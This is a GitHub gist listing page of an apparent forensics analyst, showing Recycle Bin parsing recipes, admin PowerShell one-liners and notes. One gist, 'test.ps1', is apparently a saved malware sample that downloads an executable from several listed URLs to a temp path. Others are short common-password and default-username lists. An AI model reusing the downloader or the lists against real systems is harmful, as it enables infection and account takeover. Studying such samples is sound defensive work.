Skip to content

Instantly share code, notes, and snippets.

View glassdfir's full-sized avatar

Glass glassdfir

20 followers · 7 following
View GitHub Profile
@glassdfir
glassdfir / passwrds
Created June 8, 2020 23:26
something
something else
@glassdfir
glassdfir / passwords
Created June 3, 2020 22:18
123456
password
12345678
qwerty
123456789
12345
1234
111111
1234567
dragon
@glassdfir
glassdfir / usernames
Created June 3, 2020 22:02
1337
Odinson
adm
admin
administrator
blackwidow
captAmerica
ftp
gordonb
guest
@glassdfir
glassdfir / Recbin ChefFormat
Last active January 25, 2021 22:06
Conditional_Jump('^(\\x01|\\x02)',true,'Error',10)
Find_/_Replace({'option':'Regex','string':'^(\\x02.{23})(....)'},'$1',false,false,false,false)
Subsection('^.{24}(.*)',true,true,false)
Decode_text('UTF16LE (1200)')
Find_/_Replace({'option':'Regex','string':'^(.*).'},'\\nDeleted File Path: $1',false,false,false,false)
Merge()
Subsection('^.{16}(.{8})',false,true,false)
Swap_endianness('Raw',8,true)
To_Hex('None')
Windows_Filetime_to_UNIX_Timestamp('Seconds (s)','Hex')
@glassdfir
glassdfir / Recbin
Last active May 7, 2019 02:30
https://gchq.github.io/CyberChef/#recipe=Conditional_Jump('%5E(%5C%5Cx01%7C%5C%5Cx02)',true,'DoNothing',10)Subsection('%5E.',true,true,false)Conditional_Jump('%5E%5C%5Cx01',false,'Win7',10)Conditional_Jump('%5E%5C%5Cx02',false,'Windows10',10)Jump('Continue',10)Return()Merge()Label('Win7')Subsection('.%7B24%7D(.*)',true,true,false)Decode_text('UTF16LE%20(1200)')Find_/_Replace(%7B'option':'Regex','string':'%5E(.*).'%7D,'%5C%5CnDeleted%20File%20Path:%20$1',true,false,true,false)Merge()Jump('Continue',10)Label('Windows10')Subsection('.%7B28%7D(.*)',true,true,false)Decode_text('UTF16LE%20(1200)')Find_/_Replace(%7B'option':'Regex','string':'%5E(.*).'%7D,'%5C%5CnDeleted%20File%20Path:%20$1',true,false,true,false)Merge()Label('Continue')Subsection('%5E.%7B16%7D(.%7B8%7D)',true,true,false)Swap_endianness('Raw',8,true)To_Hex('None')From_Base(16)Windows_Filetime_to_UNIX_Timestamp('Seconds%20(s)','Decimal')From_UNIX_Timestamp('Seconds%20(s)')Find_/_Replace(%7B'option':'Regex','string':'%5E(.*UTC)'%7D,'%5C%5CnFile%20Delet
@glassdfir
glassdfir / CyberChefRecycleBin.json
Last active May 7, 2019 12:24
[
{ "op": "Conditional Jump",
"args": ["^(\\x01|\\x02)", true, "Error", 10] },
{ "op": "Find / Replace",
"args": [{ "option": "Regex", "string": "^(\\x02.{23})(....)" }, "$1", false, false, false, false] },
{ "op": "Subsection",
"args": ["^.{24}(.*)", true, true, false] },
{ "op": "Decode text",
"args": ["UTF16LE (1200)"] },
{ "op": "Find / Replace",
@glassdfir
glassdfir / test.ps1
Last active November 26, 2018 02:41
$HKc='jZC';
$kSW='http://www.vladimirfilin.com/VzBE7R@http://nimsnowshera.edu.pk/D@http://sinonc.cn/uz6@http://forestbooks.cn/wp-admin/sFfyqdF@http://eskrimadecampo.ru/UVAwk'.Split('@');
$SRn=([System.IO.Path]::GetTempPath()+'\ihH.exe');
$QaY =New-Object -com 'msxml2.xmlhttp';
$Hsc = New-Object -com 'adodb.stream';
foreach($Mni in $kSW){
try{$QaY.open('GET',$Mni,0);
$QaY.send();
If ($QaY.Status -eq 200) {
$Hsc.open();
@glassdfir
glassdfir / notes for blog
Created August 19, 2018 15:24
GlassMacBookPro:~ glass$ python
Python 2.7.10 (default, Oct 6 2017, 22:29:07)
[GCC 4.2.1 Compatible Apple LLVM 9.0.0 (clang-900.0.31)] on darwin
Type "help", "copyright", "credits" or "license" for more information.
>>> import requests
>>> r = requests.get('http://d2bqtxf7nlm89w.cloudfront.net/3089eeed.crx')
>>> len(r.content)
448845
>>> rawdata = r.content
>>> from hexdump import *
@glassdfir
glassdfir / ShutdownRemoteSystem.ps1
Last active February 19, 2016 05:09
#The nice way
Stop-Computer -computerName ComputerX -force
#Old school
shutdown -s -f -t 0 -m ComputerX
#The BSOD way
get-process -computername ComputerX| stop-process -force
@glassdfir
glassdfir / Disable AD account.ps1
Created February 19, 2016 03:54
Disable-ADAccount -Identity "UserX"